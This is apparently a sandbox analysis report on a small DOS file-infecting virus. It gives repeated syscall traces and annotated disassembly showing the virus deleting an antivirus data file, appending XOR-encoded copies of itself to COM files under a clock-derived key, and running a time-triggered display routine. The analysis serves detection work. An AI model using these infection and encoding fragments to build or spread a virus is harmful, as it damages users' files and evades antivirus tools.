2018-12-25T11:42:59.843604671Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-25T11:42:59.846224687Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.84954044Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.858332846Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.862649389Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.864520018Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.874420563Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.877169687Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.892853368Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.898220637Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.904553709Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.91026086Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.927685571Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.93395516Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.942022022Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.944748934Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.94880964Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.960310384Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.963758645Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.973311427Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.977392549Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.979638117Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.987295983Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.989498225Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.000046512Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.005470262Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.01205026Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.024220897Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.031949088Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.039404842Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.041793299Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.044674257Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.047373201Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.051352349Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.060456747Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.063825218Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.066692224Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.074454945Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.076502498Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.08602338Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.092268084Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.095633465Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.107924375Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.116252616Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.123921615Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.126202415Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.130421121Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.133254669Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.136946264Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.147285721Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.150660288Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.152646514Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.161727058Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.163875568Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.172881719Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.179452067Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.183162047Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.194491588Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.203088413Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.210760028Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.2127684Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.216155664Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.219733761Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.224234254Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.233459518Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.237316585Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.239218464Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.246808969Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.249726364Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.258738105Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.264360397Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.268967411Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.280085761Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.287204853Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.295159543Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.296488894Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.298375363Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.300778032Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.306590873Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.313575012Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.316797405Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.318461256Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.323508882Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.324944912Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.334064005Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.340668478Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.34549264Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.359563603Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.369698416Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.377192413Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.379693547Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.383050138Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.385616491Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.390042119Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.398971432Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.402028422Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.404159571Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.412346593Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.414448533Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.424781366Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.430662381Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.43408075Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.445245446Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.45347812Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.461993117Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.463874029Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.474871229Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.48662535Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.495174104Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.501199777Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.505286221Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.517367323Z 59 PC: 12b1b | Change current directory
2018-12-25T11:43:00.520658935Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
; Disassembly window printed after a later INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12b1f, on the preceding log row, is `cmp dx, 5`. After Get time,
; DX = seconds (DH) : hundredths (DL), so the branch below skips the display routine
; unless seconds are 0 and hundredths are at most 5 - a narrow time-of-run trigger.
; The routine switches the video mode and prints a zero-terminated string through
; BIOS INT 10h; nothing in this window touches files.
; NOTE(review): INT 10h calls do not appear in the syscall table, so the log alone does
; not show whether this path ran. The run-metadata JSON on this page varies the Second
; field between runs, presumably to exercise this check.
0x12b22: ja 0x12b4c                       ; DX > 5 (unsigned): skip the routine
0x12b24: nop                              ; three NOPs - likely assembler padding after the jump; confirm
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd                      ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x12b2a: int 0x10                         ; BIOS video service
0x12b2c: lea si, word ptr [bp + 0x3c2]    ; SI -> byte string at bp+0x3c2
0x12b30: cld                              ; string ops advance forward
0x12b31: lodsb al, byte ptr [si]          ; AL = next byte of the string
0x12b32: or al, al                        ; set ZF when the byte is zero
0x12b34: je 0x12b43                       ; zero terminator: leave the print loop
0x12b36: nop                              ; padding, as above
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe                      ; AH=0Eh teletype output of AL
0x12b3b: xor bh, bh                       ; display page 0
0x12b3d: mov bl, 5                        ; foreground colour 5 (used in graphics modes)
0x12b3f: int 0x10                         ; print the character
0x12b41: jmp 0x12b30                      ; next character
2018-12-25T11:43:00.52389917Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1188,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.35527812Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.356728452Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.360738708Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.367150164Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.373551552Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.382764344Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.393719997Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.400548386Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.408116283Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.420378661Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.425094534Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.431035671Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.815336469Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.820676488Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.832435624Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.83482236Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:42:59.838168669Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; Disassembly window printed after the INT 21h "Get time" call (syscall op 44 = AH=2Ch).
; The instruction at 0x12c3d, on the preceding log row, stores DX into [bp + 0x42d].
; After Get time, DX holds seconds (DH) and hundredths (DL), so the 16-bit XOR key
; used below differs from one infected file to the next.
; The 21 bytes at bp+0x105 end exactly where the encoded source starts
; (0x11a - 0x105 = 0x15) and are written as-is, ahead of the encoded body.
; The three writes logged after this point (21 + 787 + 35 bytes) total 843,
; matching the 843 in the sample name.
; Analyst note: because the 787-byte body changes per infection, a byte signature
; should anchor on the 21 unencoded bytes - presumably the decoder stub; confirm
; against the sample.
; NOTE(review): this looks like a fixed 20-instruction linear disassembly from the
; syscall return address rather than an execution trace (the loop body appears once).
0x12c41: mov cx, 0x15                     ; CX = 21, the byte count of the first logged write
0x12c44: lea dx, word ptr [bp + 0x105]    ; DX -> buffer at bp+0x105
0x12c48: pop ax                           ; AX from the stack; presumably AH=40h (write) - the push is outside this window
0x12c49: int 0x21                         ; logged as "Write 21 bytes on handle 5" at PC 12c4b
0x12c4b: push ax                          ; keep the call's return value on the stack
0x12c4c: push bp
0x12c4d: mov bp, sp                       ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x12c4f: mov word ptr [bp + 2], 0x4001    ; replace the pushed AX slot with 0x4001
0x12c54: pop bp                           ; BP restored; 0x4001 stays on the stack, presumably popped into AX for a later write (not shown)
0x12c55: mov cx, 0x18a                    ; loop count 0x18a = 394 words (788 bytes)
0x12c58: mov dx, word ptr [bp + 0x42d]    ; DX = key saved from Get time
0x12c5c: lea si, word ptr [bp + 0x11a]    ; SI -> source at bp+0x11a
0x12c60: lea di, word ptr [bp + 0x505]    ; DI -> output buffer at bp+0x505
0x12c64: lodsw ax, word ptr [si]          ; AX = next source word
0x12c65: xor ax, dx                       ; XOR it with the 16-bit key
0x12c67: stosw word ptr es:[di], ax       ; store the encoded word at ES:DI
0x12c68: loop 0x12c64                     ; repeat until CX reaches 0
0x12c6a: mov cx, 0x313                    ; CX = 0x313 = 787, matching the logged "Write 787 bytes"
0x12c6d: lea dx, word ptr [bp + 0x505]    ; DX -> encoded buffer for that write
2018-12-25T11:42:59.841115551Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.846030301Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.856113898Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.859844432Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.86194339Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.866620043Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.867898929Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.874244588Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.881069018Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.884673142Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.888296718Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.920213461Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.931739471Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.940806897Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.942623435Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.945624982Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.948550982Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.952126564Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.961015594Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.965029567Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.96714497Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.974663567Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.97663262Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:42:59.986542381Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:42:59.991881388Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.99517363Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.006584801Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.013990067Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.021071273Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.023934639Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.026968287Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.029553894Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.033785736Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.042865796Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.046181801Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.048258608Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.056489665Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.058572132Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.067087354Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.072699349Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.075789119Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.086400933Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.094527649Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.101101453Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.102740181Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.10680564Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.109212074Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.112662103Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.122531073Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.130646905Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.132559382Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.143238988Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.145119039Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.153767833Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.159997795Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.163445775Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.17516167Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.184006694Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.192452678Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.194470064Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.197648859Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.201642631Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.205312105Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.21454841Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.218988932Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.2213574Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.229574659Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.232463965Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.241806537Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.247472305Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.251107107Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.26364491Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.271375686Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.279126795Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.281614201Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.284920446Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.287363083Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.298188211Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.307883188Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.310959015Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.313413109Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.321447688Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.323542444Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.333930169Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.339885813Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.343357344Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.357141588Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.364739228Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.373655422Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.375791641Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.380008338Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.385101664Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.388919335Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.401690911Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.404876186Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.406864814Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.41694929Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.418759634Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.427810863Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.43454648Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.437680982Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.449537287Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.458995989Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.466759472Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.468883304Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.477444304Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.484164589Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.487265669Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.492305002Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.497190911Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.509247396Z 59 PC: 12b1b | Change current directory
; Disassembly excerpt attached to the DOS "Get time" call (syscall 44 = INT 21h AH=2Ch),
; which returns DH = seconds and DL = hundredths of a second. It is a time-gated
; display routine. The excerpt ends at the loop's back-jump; the jump targets
; 0x12b43 and 0x12b4c are outside it.
; Analyst note: behaviour gated on the clock is only observed when a run lands in
; the window. The run records on this page carry a TimeBased flag, which presumably
; means the sandbox varied the clock between runs - confirm against the sandbox docs.
2018-12-25T11:43:00.511666602Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
; Unsigned DX > 5 skips the routine, so the code below is reached only when
; seconds == 0 and hundredths <= 5.
0x12b22: ja 0x12b4c
; NOTE(review): the nop runs after both conditional jumps look like assembler
; padding from a forward-jump size reservation; they do nothing.
0x12b24: nop
0x12b25: nop
0x12b26: nop
; INT 10h with AH=00h, AL=0Dh: set video mode 0Dh (320x200, 16 colours).
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
; SI = address of a byte string at BP+0x3c2. BP is presumably the code's runtime
; base; its setup is not part of this excerpt.
0x12b2c: lea si, word ptr [bp + 0x3c2]
; Loop head: clear DF so lodsb walks forward, then fetch the next byte into AL.
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
; A zero byte ends the string and leaves the loop.
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
; INT 10h AH=0Eh: teletype output of AL on page 0 (BH=0) with colour 5 (BL).
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
; Next character.
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.51548907Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1188,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.402411304Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.404529047Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.40774272Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.414073126Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.421779014Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.431129804Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.437993044Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.444771806Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.451575497Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.458031357Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.467208751Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.474712519Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.816488557Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.832985147Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.862264757Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.864281942Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
; Disassembly excerpt attached to the DOS "Get time" call (syscall 44 = INT 21h AH=2Ch;
; DH = seconds, DL = hundredths). It saves the time word, issues one INT 21h call,
; then XORs part of the body into a scratch buffer. The excerpt stops before the
; INT 21h that consumes the final CX/DX.
; The first instruction stores DX at [BP+0x42d]; 0x12c58 reloads it as the XOR key,
; so the key changes with the time of the call.
2018-12-25T11:42:59.867461261Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; CX = 0x15 (21) bytes, DX = buffer at BP+0x105. AX is popped from the stack, so the
; function number is not visible here; the trace logs this call as
; "Write 21 bytes on handle 5". These bytes are written as they sit in memory.
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
; The word pushed by `push ax` is overwritten in place with 0x4001 through a
; temporary BP frame ([bp+2] is that stack slot); `pop bp` restores BP.
